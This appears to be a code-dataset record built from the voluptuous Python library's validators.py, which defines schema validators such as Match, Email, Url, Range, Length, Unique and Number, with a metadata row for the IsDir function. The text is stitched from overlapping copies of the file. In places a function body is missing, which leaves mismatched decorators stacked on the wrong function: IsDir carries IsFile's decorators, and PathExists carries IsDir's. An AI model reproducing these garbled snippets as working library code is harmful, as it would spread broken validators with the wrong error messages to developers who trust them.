>>> validate = Schema(Match(re.compile(r'0x[A-F0-9]+', re.I)))
>>> validate('0x123ef4')
'0x123ef4'
"""
def __init__(self, pattern, msg=None):
if isinstance(pattern, basestring):
pattern = re.compile(pattern)
self.pattern = pattern
self.msg = msg
def __call__(self, v):
try:
match = self.pattern.match(v)
except TypeError:
raise MatchInvalid("expected string or buffer")
if not match:
raise MatchInvalid(self.msg or 'does not match regular expression')
return v
def __repr__(self):
return 'Match(%r, msg=%r)' % (self.pattern.pattern, self.msg)
class Replace(object):
"""Regex substitution.
>>> validate = Schema(All(Replace('you', 'I'),
... Replace('hello', 'goodbye')))
>>> validate('you say hello')
'I say goodbye'
"""
def __init__(self, pattern, substitution, msg=None):
if isinstance(pattern, basestring):
pattern = re.compile(pattern)
self.pattern = pattern
self.substitution = substitution
self.msg = msg
def __call__(self, v):
return self.pattern.sub(self.substitution, v)
def __repr__(self):
return 'Replace(%r, %r, msg=%r)' % (self.pattern.pattern,
self.substitution,
self.msg)
def _url_validation(v):
parsed = urlparse.urlparse(v)
if not parsed.scheme or not parsed.netloc:
raise UrlInvalid("must have a URL scheme and host")
return parsed
@message('expected an Email', cls=EmailInvalid)
def Email(v):
"""Verify that the value is an Email or not.
>>> s = Schema(Email())
>>> with raises(MultipleInvalid, 'expected an Email'):
... s("a.com")
>>> with raises(MultipleInvalid, 'expected an Email'):
... s("a@.com")
>>> with raises(MultipleInvalid, 'expected an Email'):
... s("a@.com")
>>> s('t@x.com')
't@x.com'
"""
try:
if not v or "@" not in v:
raise EmailInvalid("Invalid Email")
user_part, domain_part = v.rsplit('@', 1)
if not (USER_REGEX.match(user_part) and DOMAIN_REGEX.match(domain_part)):
raise EmailInvalid("Invalid Email")
return v
except:
raise ValueError
@message('expected a Fully qualified domain name URL', cls=UrlInvalid)
def FqdnUrl(v):
"""Verify that the value is a Fully qualified domain name URL.
>>> s = Schema(FqdnUrl())
>>> with raises(MultipleInvalid, 'expected a Fully qualified domain name URL'):
... s("http://localhost/")
>>> s('http://w3.org')
'http://w3.org'
"""
try:
parsed_url = _url_validation(v)
if "." not in parsed_url.netloc:
raise UrlInvalid("must have a domain name in URL")
return v
except:
raise ValueError
@message('expected a URL', cls=UrlInvalid)
def Url(v):
"""Verify that the value is a URL.
>>> s = Schema(Url())
>>> with raises(MultipleInvalid, 'expected a URL'):
... s(1)
>>> s('http://w3.org')
'http://w3.org'
"""
try:
_url_validation(v)
return v
except:
raise ValueError
@message('not a file', cls=FileInvalid)
@truth
@message('not a directory', cls=DirInvalid)
@truth
def IsDir(v):
"""Verify the directory exists.
>>> IsDir()('/')
'/'
>>> with raises(DirInvalid, 'Not a directory'):
... IsDir()(None)
"""
try:
if v:
v = str(v)
return os.path.isdir(v)
else:
raise DirInvalid("Not a directory")
except TypeError:
raise DirInvalid("Not a directory")
@message('path does not exist', cls=PathInvalid)
@truth
def PathExists(v):
"""Verify the path exists, regardless of its type.
>>> os.path.basename(PathExists()(__file__)).startswith('validators.py')
True
>>> with raises(Invalid, 'path does not exist'):
... PathExists()("random_filename_goes_here.py")
>>> with raises(PathInvalid, 'Not a Path'):
... PathExists()(None)
"""
try:
if v:
v = str(v)
return os.path.exists(v)
else:
raise PathInvalid("Not a Path")
except TypeError:
raise PathInvalid("Not a Path")
def Maybe(validator, msg=None):
"""Validate that the object matches given validator or is None.
:raises Invalid: if the value does not match the given validator and is not
None
>>> s = Schema(Maybe(int))
>>> s(10)
10
>>> with raises(Invalid):
... s("string")
"""
return Any(None, validator, msg=msg)
class Range(object):
"""Limit a value to a range.
Either min or max may be omitted.
Either min or max can be excluded from the range of accepted values.
:raises Invalid: If the value is outside the range.
>>> s = Schema(Range(min=1, max=10, min_included=False))
>>> s(5)
5
>>> s(10)
10
>>> with raises(MultipleInvalid, 'value must be at most 10'):
... s(20)
>>> with raises(MultipleInvalid, 'value must be higher than 1'):
... s(1)
>>> with raises(MultipleInvalid, 'value must be lower than 10'):
... Schema(Range(max=10, max_included=False))(20)
"""
def __init__(self, min=None, max=None, min_included=True,
max_included=True, msg=None):
self.min = min
self.max = max
self.min_included = min_included
self.max_included = max_included
self.msg = msg
def __call__(self, v):
if self.min_included:
if self.min is not None and not v >= self.min:
raise RangeInvalid(
self.msg or 'value must be at least %s' % self.min)
else:
if self.min is not None and not v > self.min:
raise RangeInvalid(
self.msg or 'value must be higher than %s' % self.min)
if self.max_included:
if self.max is not None and not v <= self.max:
raise RangeInvalid(
self.msg or 'value must be at most %s' % self.max)
else:
if self.max is not None and not v < self.max:
raise RangeInvalid(
self.msg or 'value must be lower than %s' % self.max)
return v
def __repr__(self):
return ('Range(min=%r, max=%r, min_included=%r,'
' max_included=%r, msg=%r)' % (self.min, self.max,
self.min_included,
self.max_included,
self.msg))
class Clamp(object):
"""Clamp a value to a range.
Either min or max may be omitted.
>>> s = Schema(Clamp(min=0, max=1))
>>> s(0.5)
0.5
>>> s(5)
1
>>> s(-1)
0
"""
def __init__(self, min=None, max=None, msg=None):
self.min = min
self.max = max
self.msg = msg
def __call__(self, v):
if self.min is not None and v < self.min:
v = self.min
if self.max is not None and v > self.max:
v = self.max
return v
def __repr__(self):
return 'Clamp(min=%s, max=%s)' % (self.min, self.max)
class Length(object):
"""The length of a value must be in a certain range."""
def __init__(self, min=None, max=None, msg=None):
self.min = min
self.max = max
self.msg = msg
def __call__(self, v):
if self.min is not None and len(v) < self.min:
raise LengthInvalid(
self.msg or 'length of value must be at least %s' % self.min)
if self.max is not None and len(v) > self.max:
raise LengthInvalid(
self.msg or 'length of value must be at most %s' % self.max)
return v
def __repr__(self):
return 'Length(min=%s, max=%s)' % (self.min, self.max)
class Datetime(object):
"""Validate that the value matches the datetime format."""
DEFAULT_FORMAT = '%Y-%m-%dT%H:%M:%S.%fZ'
def __init__(self, format=None, msg=None):
self.format = format or self.DEFAULT_FORMAT
self.msg = msg
def __call__(self, v):
try:
datetime.datetime.strptime(v, self.format)
except (TypeError, ValueError):
raise DatetimeInvalid(
self.msg or 'value does not match'
' expected format %s' % self.format)
return v
def __repr__(self):
return 'Datetime(format=%s)' % self.format
class Date(Datetime):
"""Validate that the value matches the date format."""
DEFAULT_FORMAT = '%Y-%m-%d'
def __call__(self, v):
try:
datetime.datetime.strptime(v, self.format)
except (TypeError, ValueError):
raise DateInvalid(
self.msg or 'value does not match'
' expected format %s' % self.format)
return v
def __repr__(self):
return 'Date(format=%s)' % self.format
class In(object):
"""Validate that a value is in a collection."""
def __init__(self, container, msg=None):
self.container = container
self.msg = msg
def __call__(self, v):
try:
check = v not in self.container
except TypeError:
check = True
if check:
raise InInvalid(self.msg or 'value is not allowed')
return v
def __repr__(self):
return 'In(%s)' % (self.container,)
class NotIn(object):
"""Validate that a value is not in a collection."""
def __init__(self, container, msg=None):
self.container = container
self.msg = msg
def __call__(self, v):
try:
check = v in self.container
except TypeError:
check = True
if check:
raise NotInInvalid(self.msg or 'value is not allowed')
return v
def __repr__(self):
return 'NotIn(%s)' % (self.container,)
class Contains(object):
"""Validate that the given schema element is in the sequence being validated.
>>> s = Contains(1)
>>> s([3, 2, 1])
[3, 2, 1]
>>> with raises(ContainsInvalid, 'value is not allowed'):
... s([3, 2])
"""
def __init__(self, item, msg=None):
self.item = item
self.msg = msg
def __call__(self, v):
try:
check = self.item not in v
except TypeError:
check = True
if check:
raise ContainsInvalid(self.msg or 'value is not allowed')
return v
def __repr__(self):
return 'Contains(%s)' % (self.item,)
class ExactSequence(object):
"""Matches each element in a sequence against the corresponding element in
the validators.
:param msg: Message to deliver to user if validation fails.
:param kwargs: All other keyword arguments are passed to the sub-Schema
constructors.
>>> from voluptuous import Schema, ExactSequence
>>> validate = Schema(ExactSequence([str, int, list, list]))
>>> validate(['hourly_report', 10, [], []])
['hourly_report', 10, [], []]
>>> validate(('hourly_report', 10, [], []))
('hourly_report', 10, [], [])
"""
def __init__(self, validators, **kwargs):
self.validators = validators
self.msg = kwargs.pop('msg', None)
self._schemas = [Schema(val, **kwargs) for val in validators]
def __call__(self, v):
if not isinstance(v, (list, tuple)) or len(v) != len(self._schemas):
raise ExactSequenceInvalid(self.msg)
try:
v = type(v)(schema(x) for x, schema in zip(v, self._schemas))
except Invalid as e:
raise e if self.msg is None else ExactSequenceInvalid(self.msg)
return v
def __repr__(self):
return 'ExactSequence([%s])' % (", ".join(repr(v)
for v in self.validators))
class Unique(object):
"""Ensure an iterable does not contain duplicate items.
Only iterables convertable to a set are supported (native types and
objects with correct __eq__).
JSON does not support set, so they need to be presented as arrays.
Unique allows ensuring that such array does not contain dupes.
>>> s = Schema(Unique())
>>> s([])
[]
>>> s([1, 2])
[1, 2]
>>> with raises(Invalid, 'contains duplicate items: [1]'):
... s([1, 1, 2])
>>> with raises(Invalid, "contains duplicate items: ['one']"):
... s(['one', 'two', 'one'])
>>> with raises(Invalid, regex="^contains unhashable elements: "):
... s([set([1, 2]), set([3, 4])])
>>> s('abc')
'abc'
>>> with raises(Invalid, regex="^contains duplicate items: "):
... s('aabbc')
"""
def __init__(self, msg=None):
self.msg = msg
def __call__(self, v):
try:
set_v = set(v)
except TypeError as e:
raise TypeInvalid(
self.msg or 'contains unhashable elements: {0}'.format(e))
if len(set_v) != len(v):
seen = set()
dupes = list(set(x for x in v if x in seen or seen.add(x)))
raise Invalid(
self.msg or 'contains duplicate items: {0}'.format(dupes))
return v
def __repr__(self):
return 'Unique()'
class Equal(object):
"""Ensure that value matches target.
>>> s = Schema(Equal(1))
>>> s(1)
1
>>> with raises(Invalid):
... s(2)
Validators are not supported, match must be exact:
>>> s = Schema(Equal(str))
>>> with raises(Invalid):
... s('foo')
"""
def __init__(self, target, msg=None):
self.target = target
self.msg = msg
def __call__(self, v):
if v != self.target:
raise Invalid(self.msg or 'Values are not equal: value:{} != target:{}'.format(v, self.target))
return v
def __repr__(self):
return 'Equal({})'.format(self.target)
class Unordered(object):
"""Ensures sequence contains values in unspecified order.
>>> s = Schema(Unordered([2, 1]))
>>> s([2, 1])
[2, 1]
>>> s([1, 2])
[1, 2]
>>> s = Schema(Unordered([str, int]))
>>> s(['foo', 1])
['foo', 1]
>>> s([1, 'foo'])
[1, 'foo']
"""
def __init__(self, validators, msg=None, **kwargs):
self.validators = validators
self.msg = msg
self._schemas = [Schema(val, **kwargs) for val in validators]
def __call__(self, v):
if not isinstance(v, (list, tuple)):
raise Invalid(self.msg or 'Value {} is not sequence!'.format(v))
if len(v) != len(self._schemas):
raise Invalid(self.msg or 'List lengths differ, value:{} != target:{}'.format(len(v), len(self._schemas)))
consumed = set()
missing = []
for index, value in enumerate(v):
found = False
for i, s in enumerate(self._schemas):
if i in consumed:
continue
try:
s(value)
except Invalid:
pass
else:
found = True
consumed.add(i)
break
if not found:
missing.append((index, value))
if len(missing) == 1:
el = missing[0]
raise Invalid(self.msg or 'Element #{} ({}) is not valid against any validator'.format(el[0], el[1]))
elif missing:
raise MultipleInvalid([Invalid(self.msg or 'Element #{} ({}) is not valid against any validator'.format(
el[0], el[1])) for el in missing])
return v
def __repr__(self):
return 'Unordered([{}])'.format(", ".join(repr(v) for v in self.validators))
class Number(object):
"""
Verify the number of digits that are present in the number(Precision),
and the decimal places(Scale)
:raises Invalid: If the value does not match the provided Precision and Scale.
>>> schema = Schema(Number(precision=6, scale=2))
>>> schema('1234.01')
'1234.01'
>>> schema = Schema(Number(precision=6, scale=2, yield_decimal=True))
>>> schema('1234.01')
Decimal('1234.01')
"""
def __init__(self, precision=None, scale=None, msg=None, yield_decimal=False):
self.precision = precision
self.scale = scale
self.msg = msg
self.yield_decimal = yield_decimal
def __call__(self, v):
"""
:param v: is a number enclosed with string
:return: Decimal number
"""
precision, scale, decimal_num = self._get_precision_scale(v)
if self.precision is not None and self.scale is not None and precision != self.precision\
and scale != self.scale:
raise Invalid(self.msg or "Precision must be equal to %s, and Scale must be equal to %s" % (self.precision,
self.scale))
else:
if self.precision is not None and precision != self.precision:
raise Invalid(self.msg or "Precision must be equal to %s" % self.precision)
if self.scale is not None and scale != self.scale:
raise Invalid(self.msg or "Scale must be equal to %s" % self.scale)
if self.yield_decimal:
return decimal_num
else:
return v
def __repr__(self):
return ('Number(precision=%s, scale=%s, msg=%s)' % (self.precision, self.scale, self.msg))
def _get_precision_scale(self, number):
"""
:param number:
:return: tuple(precision, scale, decimal_number)
"""
try:
decimal_num = Decimal(number)
except InvalidOperation:
raise Invalid(self.msg or 'Value must be a number enclosed with string')
return (len(decimal_num.as_tuple().digits), -(decimal_num.as_tuple().exponent), decimal_num)
class SomeOf(_WithSubValidators):
"""Value must pass at least some validations, determined by the given parameter.
Optionally, number of passed validations can be capped.
The output of each validator is passed as input to the next.
:param min_valid: Minimum number of valid schemas.
:param validators: a list of schemas or validators to match input against
:param max_valid: Maximum number of valid schemas.
:param msg: Message to deliver to user if validation fails.
:param kwargs: All other keyword arguments are passed to the sub-Schema constructors.
:raises NotEnoughValid: if the minimum number of validations isn't met
:raises TooManyValid: if the more validations than the given amount is met
>>> validate = Schema(SomeOf(min_valid=2, validators=[Range(1, 5), Any(float, int), 6.6]))
>>> validate(6.6)
6.6
>>> validate(3)
3
>>> with raises(MultipleInvalid, 'value must be at most 5, not a valid value'):
... validate(6.2)
"""
def __init__(self, validators, min_valid=None, max_valid=None, **kwargs):
assert min_valid is not None or max_valid is not None, \
'when using "%s" you should specify at least one of min_valid and max_valid' % (type(self).__name__,)
self.min_valid = min_valid or 0
self.max_valid = max_valid or len(validators)
super(SomeOf, self).__init__(*validators, **kwargs)
def _exec(self, funcs, v, path=None):
errors = []
funcs = list(funcs)
for func in funcs:
try:
if path is None:
v = func(v)
else:
v = func(path, v)
except Invalid as e:
errors.append(e)
passed_count = len(funcs) - len(errors)
if self.min_valid <= passed_count <= self.max_valid:
return v
msg = self.msg
if not msg:
msg = ', '.join(map(str, errors))
if passed_count > self.max_valid:
raise TooManyValid(msg)
raise NotEnoughValid(msg)
def __repr__(self):
return 'SomeOf(min_valid=%s, validators=[%s], max_valid=%s, msg=%r)' % (
self.min_valid, ", ".join(repr(v) for v in self.validators), self.max_valid, self.msg)
|
alecthomas/voluptuous | voluptuous/validators.py | IsDir | python | def IsDir(v):
try:
if v:
v = str(v)
return os.path.isdir(v)
else:
raise DirInvalid("Not a directory")
except TypeError:
raise DirInvalid("Not a directory") | Verify the directory exists.
>>> IsDir()('/')
'/'
>>> with raises(DirInvalid, 'Not a directory'):
... IsDir()(None) | train | https://github.com/alecthomas/voluptuous/blob/36c8c11e2b7eb402c24866fa558473661ede9403/voluptuous/validators.py#L451-L466 | null | import os
import re
import datetime
import sys
from functools import wraps
from decimal import Decimal, InvalidOperation
from voluptuous.schema_builder import Schema, raises, message
from voluptuous.error import (MultipleInvalid, CoerceInvalid, TrueInvalid, FalseInvalid, BooleanInvalid, Invalid,
AnyInvalid, AllInvalid, MatchInvalid, UrlInvalid, EmailInvalid, FileInvalid, DirInvalid,
RangeInvalid, PathInvalid, ExactSequenceInvalid, LengthInvalid, DatetimeInvalid,
DateInvalid, InInvalid, TypeInvalid, NotInInvalid, ContainsInvalid, NotEnoughValid,
TooManyValid)
if sys.version_info >= (3,):
import urllib.parse as urlparse
basestring = str
else:
import urlparse
# Taken from https://github.com/kvesteri/validators/blob/master/validators/email.py
USER_REGEX = re.compile(
# dot-atom
r"(^[-!#$%&'*+/=?^_`{}|~0-9A-Z]+"
r"(\.[-!#$%&'*+/=?^_`{}|~0-9A-Z]+)*$"
# quoted-string
r'|^"([\001-\010\013\014\016-\037!#-\[\]-\177]|'
r"""\\[\001-\011\013\014\016-\177])*"$)""",
re.IGNORECASE
)
DOMAIN_REGEX = re.compile(
# domain
r'(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+'
r'(?:[A-Z]{2,6}\.?|[A-Z0-9-]{2,}\.?$)'
# literal form, ipv4 address (SMTP 4.1.3)
r'|^\[(25[0-5]|2[0-4]\d|[0-1]?\d?\d)'
r'(\.(25[0-5]|2[0-4]\d|[0-1]?\d?\d)){3}\]$',
re.IGNORECASE)
__author__ = 'tusharmakkar08'
def truth(f):
"""Convenience decorator to convert truth functions into validators.
>>> @truth
... def isdir(v):
... return os.path.isdir(v)
>>> validate = Schema(isdir)
>>> validate('/')
'/'
>>> with raises(MultipleInvalid, 'not a valid value'):
... validate('/notavaliddir')
"""
@wraps(f)
def check(v):
t = f(v)
if not t:
raise ValueError
return v
return check
class Coerce(object):
"""Coerce a value to a type.
If the type constructor throws a ValueError or TypeError, the value
will be marked as Invalid.
Default behavior:
>>> validate = Schema(Coerce(int))
>>> with raises(MultipleInvalid, 'expected int'):
... validate(None)
>>> with raises(MultipleInvalid, 'expected int'):
... validate('foo')
With custom message:
>>> validate = Schema(Coerce(int, "moo"))
>>> with raises(MultipleInvalid, 'moo'):
... validate('foo')
"""
def __init__(self, type, msg=None):
self.type = type
self.msg = msg
self.type_name = type.__name__
def __call__(self, v):
try:
return self.type(v)
except (ValueError, TypeError, InvalidOperation):
msg = self.msg or ('expected %s' % self.type_name)
raise CoerceInvalid(msg)
def __repr__(self):
return 'Coerce(%s, msg=%r)' % (self.type_name, self.msg)
@message('value was not true', cls=TrueInvalid)
@truth
def IsTrue(v):
"""Assert that a value is true, in the Python sense.
>>> validate = Schema(IsTrue())
"In the Python sense" means that implicitly false values, such as empty
lists, dictionaries, etc. are treated as "false":
>>> with raises(MultipleInvalid, "value was not true"):
... validate([])
>>> validate([1])
[1]
>>> with raises(MultipleInvalid, "value was not true"):
... validate(False)
...and so on.
>>> try:
... validate([])
... except MultipleInvalid as e:
... assert isinstance(e.errors[0], TrueInvalid)
"""
return v
@message('value was not false', cls=FalseInvalid)
def IsFalse(v):
"""Assert that a value is false, in the Python sense.
(see :func:`IsTrue` for more detail)
>>> validate = Schema(IsFalse())
>>> validate([])
[]
>>> with raises(MultipleInvalid, "value was not false"):
... validate(True)
>>> try:
... validate(True)
... except MultipleInvalid as e:
... assert isinstance(e.errors[0], FalseInvalid)
"""
if v:
raise ValueError
return v
@message('expected boolean', cls=BooleanInvalid)
def Boolean(v):
"""Convert human-readable boolean values to a bool.
Accepted values are 1, true, yes, on, enable, and their negatives.
Non-string values are cast to bool.
>>> validate = Schema(Boolean())
>>> validate(True)
True
>>> validate("1")
True
>>> validate("0")
False
>>> with raises(MultipleInvalid, "expected boolean"):
... validate('moo')
>>> try:
... validate('moo')
... except MultipleInvalid as e:
... assert isinstance(e.errors[0], BooleanInvalid)
"""
if isinstance(v, basestring):
v = v.lower()
if v in ('1', 'true', 'yes', 'on', 'enable'):
return True
if v in ('0', 'false', 'no', 'off', 'disable'):
return False
raise ValueError
return bool(v)
class _WithSubValidators(object):
"""Base class for validators that use sub-validators.
Special class to use as a parent class for validators using sub-validators.
This class provides the `__voluptuous_compile__` method so the
sub-validators are compiled by the parent `Schema`.
"""
def __init__(self, *validators, **kwargs):
self.validators = validators
self.msg = kwargs.pop('msg', None)
self.required = kwargs.pop('required', False)
def __voluptuous_compile__(self, schema):
self._compiled = []
for v in self.validators:
schema.required = self.required
self._compiled.append(schema._compile(v))
return self._run
def _run(self, path, value):
return self._exec(self._compiled, value, path)
def __call__(self, v):
return self._exec((Schema(val) for val in self.validators), v)
def __repr__(self):
return '%s(%s, msg=%r)' % (
self.__class__.__name__,
", ".join(repr(v) for v in self.validators),
self.msg
)
class Any(_WithSubValidators):
"""Use the first validated value.
:param msg: Message to deliver to user if validation fails.
:param kwargs: All other keyword arguments are passed to the sub-Schema constructors.
:returns: Return value of the first validator that passes.
>>> validate = Schema(Any('true', 'false',
... All(Any(int, bool), Coerce(bool))))
>>> validate('true')
'true'
>>> validate(1)
True
>>> with raises(MultipleInvalid, "not a valid value"):
... validate('moo')
msg argument is used
>>> validate = Schema(Any(1, 2, 3, msg="Expected 1 2 or 3"))
>>> validate(1)
1
>>> with raises(MultipleInvalid, "Expected 1 2 or 3"):
... validate(4)
"""
def _exec(self, funcs, v, path=None):
error = None
for func in funcs:
try:
if path is None:
return func(v)
else:
return func(path, v)
except Invalid as e:
if error is None or len(e.path) > len(error.path):
error = e
else:
if error:
raise error if self.msg is None else AnyInvalid(
self.msg, path=path)
raise AnyInvalid(self.msg or 'no valid value found',
path=path)
# Convenience alias
Or = Any
class All(_WithSubValidators):
"""Value must pass all validators.
The output of each validator is passed as input to the next.
:param msg: Message to deliver to user if validation fails.
:param kwargs: All other keyword arguments are passed to the sub-Schema constructors.
>>> validate = Schema(All('10', Coerce(int)))
>>> validate('10')
10
"""
def _exec(self, funcs, v, path=None):
try:
for func in funcs:
if path is None:
v = func(v)
else:
v = func(path, v)
except Invalid as e:
raise e if self.msg is None else AllInvalid(self.msg, path=path)
return v
# Convenience alias
And = All
class Match(object):
"""Value must be a string that matches the regular expression.
>>> validate = Schema(Match(r'^0x[A-F0-9]+$'))
>>> validate('0x123EF4')
'0x123EF4'
>>> with raises(MultipleInvalid, "does not match regular expression"):
... validate('123EF4')
>>> with raises(MultipleInvalid, 'expected string or buffer'):
... validate(123)
Pattern may also be a _compiled regular expression:
>>> validate = Schema(Match(re.compile(r'0x[A-F0-9]+', re.I)))
>>> validate('0x123ef4')
'0x123ef4'
"""
def __init__(self, pattern, msg=None):
if isinstance(pattern, basestring):
pattern = re.compile(pattern)
self.pattern = pattern
self.msg = msg
def __call__(self, v):
try:
match = self.pattern.match(v)
except TypeError:
raise MatchInvalid("expected string or buffer")
if not match:
raise MatchInvalid(self.msg or 'does not match regular expression')
return v
def __repr__(self):
return 'Match(%r, msg=%r)' % (self.pattern.pattern, self.msg)
class Replace(object):
"""Regex substitution.
>>> validate = Schema(All(Replace('you', 'I'),
... Replace('hello', 'goodbye')))
>>> validate('you say hello')
'I say goodbye'
"""
def __init__(self, pattern, substitution, msg=None):
if isinstance(pattern, basestring):
pattern = re.compile(pattern)
self.pattern = pattern
self.substitution = substitution
self.msg = msg
def __call__(self, v):
return self.pattern.sub(self.substitution, v)
def __repr__(self):
return 'Replace(%r, %r, msg=%r)' % (self.pattern.pattern,
self.substitution,
self.msg)
def _url_validation(v):
parsed = urlparse.urlparse(v)
if not parsed.scheme or not parsed.netloc:
raise UrlInvalid("must have a URL scheme and host")
return parsed
@message('expected an Email', cls=EmailInvalid)
def Email(v):
"""Verify that the value is an Email or not.
>>> s = Schema(Email())
>>> with raises(MultipleInvalid, 'expected an Email'):
... s("a.com")
>>> with raises(MultipleInvalid, 'expected an Email'):
... s("a@.com")
>>> with raises(MultipleInvalid, 'expected an Email'):
... s("a@.com")
>>> s('t@x.com')
't@x.com'
"""
try:
if not v or "@" not in v:
raise EmailInvalid("Invalid Email")
user_part, domain_part = v.rsplit('@', 1)
if not (USER_REGEX.match(user_part) and DOMAIN_REGEX.match(domain_part)):
raise EmailInvalid("Invalid Email")
return v
except:
raise ValueError
@message('expected a Fully qualified domain name URL', cls=UrlInvalid)
def FqdnUrl(v):
"""Verify that the value is a Fully qualified domain name URL.
>>> s = Schema(FqdnUrl())
>>> with raises(MultipleInvalid, 'expected a Fully qualified domain name URL'):
... s("http://localhost/")
>>> s('http://w3.org')
'http://w3.org'
"""
try:
parsed_url = _url_validation(v)
if "." not in parsed_url.netloc:
raise UrlInvalid("must have a domain name in URL")
return v
except:
raise ValueError
@message('expected a URL', cls=UrlInvalid)
def Url(v):
"""Verify that the value is a URL.
>>> s = Schema(Url())
>>> with raises(MultipleInvalid, 'expected a URL'):
... s(1)
>>> s('http://w3.org')
'http://w3.org'
"""
try:
_url_validation(v)
return v
except:
raise ValueError
@message('not a file', cls=FileInvalid)
@truth
def IsFile(v):
"""Verify the file exists.
>>> os.path.basename(IsFile()(__file__)).startswith('validators.py')
True
>>> with raises(FileInvalid, 'not a file'):
... IsFile()("random_filename_goes_here.py")
>>> with raises(FileInvalid, 'Not a file'):
... IsFile()(None)
"""
try:
if v:
v = str(v)
return os.path.isfile(v)
else:
raise FileInvalid('Not a file')
except TypeError:
raise FileInvalid('Not a file')
@message('not a directory', cls=DirInvalid)
@truth
@message('path does not exist', cls=PathInvalid)
@truth
def PathExists(v):
"""Verify the path exists, regardless of its type.
>>> os.path.basename(PathExists()(__file__)).startswith('validators.py')
True
>>> with raises(Invalid, 'path does not exist'):
... PathExists()("random_filename_goes_here.py")
>>> with raises(PathInvalid, 'Not a Path'):
... PathExists()(None)
"""
try:
if v:
v = str(v)
return os.path.exists(v)
else:
raise PathInvalid("Not a Path")
except TypeError:
raise PathInvalid("Not a Path")
def Maybe(validator, msg=None):
"""Validate that the object matches given validator or is None.
:raises Invalid: if the value does not match the given validator and is not
None
>>> s = Schema(Maybe(int))
>>> s(10)
10
>>> with raises(Invalid):
... s("string")
"""
return Any(None, validator, msg=msg)
class Range(object):
"""Limit a value to a range.
Either min or max may be omitted.
Either min or max can be excluded from the range of accepted values.
:raises Invalid: If the value is outside the range.
>>> s = Schema(Range(min=1, max=10, min_included=False))
>>> s(5)
5
>>> s(10)
10
>>> with raises(MultipleInvalid, 'value must be at most 10'):
... s(20)
>>> with raises(MultipleInvalid, 'value must be higher than 1'):
... s(1)
>>> with raises(MultipleInvalid, 'value must be lower than 10'):
... Schema(Range(max=10, max_included=False))(20)
"""
def __init__(self, min=None, max=None, min_included=True,
max_included=True, msg=None):
self.min = min
self.max = max
self.min_included = min_included
self.max_included = max_included
self.msg = msg
def __call__(self, v):
if self.min_included:
if self.min is not None and not v >= self.min:
raise RangeInvalid(
self.msg or 'value must be at least %s' % self.min)
else:
if self.min is not None and not v > self.min:
raise RangeInvalid(
self.msg or 'value must be higher than %s' % self.min)
if self.max_included:
if self.max is not None and not v <= self.max:
raise RangeInvalid(
self.msg or 'value must be at most %s' % self.max)
else:
if self.max is not None and not v < self.max:
raise RangeInvalid(
self.msg or 'value must be lower than %s' % self.max)
return v
def __repr__(self):
return ('Range(min=%r, max=%r, min_included=%r,'
' max_included=%r, msg=%r)' % (self.min, self.max,
self.min_included,
self.max_included,
self.msg))
class Clamp(object):
"""Clamp a value to a range.
Either min or max may be omitted.
>>> s = Schema(Clamp(min=0, max=1))
>>> s(0.5)
0.5
>>> s(5)
1
>>> s(-1)
0
"""
def __init__(self, min=None, max=None, msg=None):
self.min = min
self.max = max
self.msg = msg
def __call__(self, v):
if self.min is not None and v < self.min:
v = self.min
if self.max is not None and v > self.max:
v = self.max
return v
def __repr__(self):
return 'Clamp(min=%s, max=%s)' % (self.min, self.max)
class Length(object):
"""The length of a value must be in a certain range."""
def __init__(self, min=None, max=None, msg=None):
self.min = min
self.max = max
self.msg = msg
def __call__(self, v):
if self.min is not None and len(v) < self.min:
raise LengthInvalid(
self.msg or 'length of value must be at least %s' % self.min)
if self.max is not None and len(v) > self.max:
raise LengthInvalid(
self.msg or 'length of value must be at most %s' % self.max)
return v
def __repr__(self):
return 'Length(min=%s, max=%s)' % (self.min, self.max)
class Datetime(object):
"""Validate that the value matches the datetime format."""
DEFAULT_FORMAT = '%Y-%m-%dT%H:%M:%S.%fZ'
def __init__(self, format=None, msg=None):
self.format = format or self.DEFAULT_FORMAT
self.msg = msg
def __call__(self, v):
try:
datetime.datetime.strptime(v, self.format)
except (TypeError, ValueError):
raise DatetimeInvalid(
self.msg or 'value does not match'
' expected format %s' % self.format)
return v
def __repr__(self):
return 'Datetime(format=%s)' % self.format
class Date(Datetime):
"""Validate that the value matches the date format."""
DEFAULT_FORMAT = '%Y-%m-%d'
def __call__(self, v):
try:
datetime.datetime.strptime(v, self.format)
except (TypeError, ValueError):
raise DateInvalid(
self.msg or 'value does not match'
' expected format %s' % self.format)
return v
def __repr__(self):
return 'Date(format=%s)' % self.format
class In(object):
"""Validate that a value is in a collection."""
def __init__(self, container, msg=None):
self.container = container
self.msg = msg
def __call__(self, v):
try:
check = v not in self.container
except TypeError:
check = True
if check:
raise InInvalid(self.msg or 'value is not allowed')
return v
def __repr__(self):
return 'In(%s)' % (self.container,)
class NotIn(object):
"""Validate that a value is not in a collection."""
def __init__(self, container, msg=None):
self.container = container
self.msg = msg
def __call__(self, v):
try:
check = v in self.container
except TypeError:
check = True
if check:
raise NotInInvalid(self.msg or 'value is not allowed')
return v
def __repr__(self):
return 'NotIn(%s)' % (self.container,)
class Contains(object):
"""Validate that the given schema element is in the sequence being validated.
>>> s = Contains(1)
>>> s([3, 2, 1])
[3, 2, 1]
>>> with raises(ContainsInvalid, 'value is not allowed'):
... s([3, 2])
"""
def __init__(self, item, msg=None):
self.item = item
self.msg = msg
def __call__(self, v):
try:
check = self.item not in v
except TypeError:
check = True
if check:
raise ContainsInvalid(self.msg or 'value is not allowed')
return v
def __repr__(self):
return 'Contains(%s)' % (self.item,)
class ExactSequence(object):
"""Matches each element in a sequence against the corresponding element in
the validators.
:param msg: Message to deliver to user if validation fails.
:param kwargs: All other keyword arguments are passed to the sub-Schema
constructors.
>>> from voluptuous import Schema, ExactSequence
>>> validate = Schema(ExactSequence([str, int, list, list]))
>>> validate(['hourly_report', 10, [], []])
['hourly_report', 10, [], []]
>>> validate(('hourly_report', 10, [], []))
('hourly_report', 10, [], [])
"""
def __init__(self, validators, **kwargs):
self.validators = validators
self.msg = kwargs.pop('msg', None)
self._schemas = [Schema(val, **kwargs) for val in validators]
def __call__(self, v):
if not isinstance(v, (list, tuple)) or len(v) != len(self._schemas):
raise ExactSequenceInvalid(self.msg)
try:
v = type(v)(schema(x) for x, schema in zip(v, self._schemas))
except Invalid as e:
raise e if self.msg is None else ExactSequenceInvalid(self.msg)
return v
def __repr__(self):
return 'ExactSequence([%s])' % (", ".join(repr(v)
for v in self.validators))
class Unique(object):
"""Ensure an iterable does not contain duplicate items.
Only iterables convertable to a set are supported (native types and
objects with correct __eq__).
JSON does not support set, so they need to be presented as arrays.
Unique allows ensuring that such array does not contain dupes.
